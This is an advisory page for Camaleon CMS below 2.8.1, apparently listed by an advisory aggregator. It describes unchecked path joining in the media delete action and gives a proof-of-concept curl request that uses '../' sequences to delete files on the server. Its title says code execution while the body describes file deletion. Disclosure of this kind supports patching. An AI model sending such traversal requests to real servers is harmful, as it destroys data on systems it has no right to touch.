Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0zaHA4LTZqMjQtbTVnbc4AA_uy
Camaleon CMS vulnerable to remote code execution through code injection (GHSL-2024-185)
The actions defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The crop_url action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently.
Arbitrary file deletion can be exploited with following code path:
The parameter folder flows from the actions method:
def actions
authorize! :manage, :media if params[:media_action] != 'crop_url'
params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
case params[:media_action]
[..]
when 'del_file'
cama_uploader.delete_file(params[:folder].gsub('//', '/'))
render plain: ''
into the method delete_file of the CamaleonCmsLocalUploader
class (when files are uploaded locally):
def delete_file(key)
file = File.join(@root_folder, key)
FileUtils.rm(file) if File.exist? file
@instance.hooks_run('after_delete', key)
get_media_collection.find_by_key(key).take.destroy
end
Where it is joined in an unchecked manner with the root folder and
then deleted.
Proof of concept
The following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below)
curl --path-as-is -i -s -k -X $'POST' \
-H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
-b $'auth_token=[..]; _cms_session=[..]' \
--data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
2F..
2F..
2FREADME.md&media_action=del_file' \
$'https://<camaleon-host>/admin/media/actions?actions=true'
Impact
This issue may lead to a defective CMS or system.
Remediation
Normalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the
targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.
See also:
CodeQL: Uncontrolled data used in path expression
OWASP: Path Traversal
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zaHA4LTZqMjQtbTVnbc4AA_uy
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 28 days ago
Updated: 28 days ago
Identifiers: GHSA-3hp8-6j24-m5gm
References:
- https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-7x4w-cj9r-h4v9
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-7x4w-cj9r-h4v9.yml
- https://github.com/advisories/GHSA-3hp8-6j24-m5gm
Blast Radius: 0.0
Affected Packages
rubygems:camaleon_cms
Dependent packages: 7Dependent repositories: 19
Downloads: 335,994 total
Affected Version Ranges: < 2.8.1
Fixed in: 2.8.1
All affected versions: 0.0.1, 0.0.2, 0.1.2, 0.1.3, 0.1.4, 0.1.5, 0.1.6, 0.1.7, 0.1.8, 0.1.9, 0.2.0, 0.2.1, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.1.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.1.0, 2.1.1, 2.2.0, 2.2.1, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.3.5, 2.3.6, 2.3.7, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.7.0, 2.7.1, 2.7.2, 2.7.3, 2.7.4, 2.7.5, 2.8.0
All unaffected versions: 2.8.1, 2.8.2, 2.8.3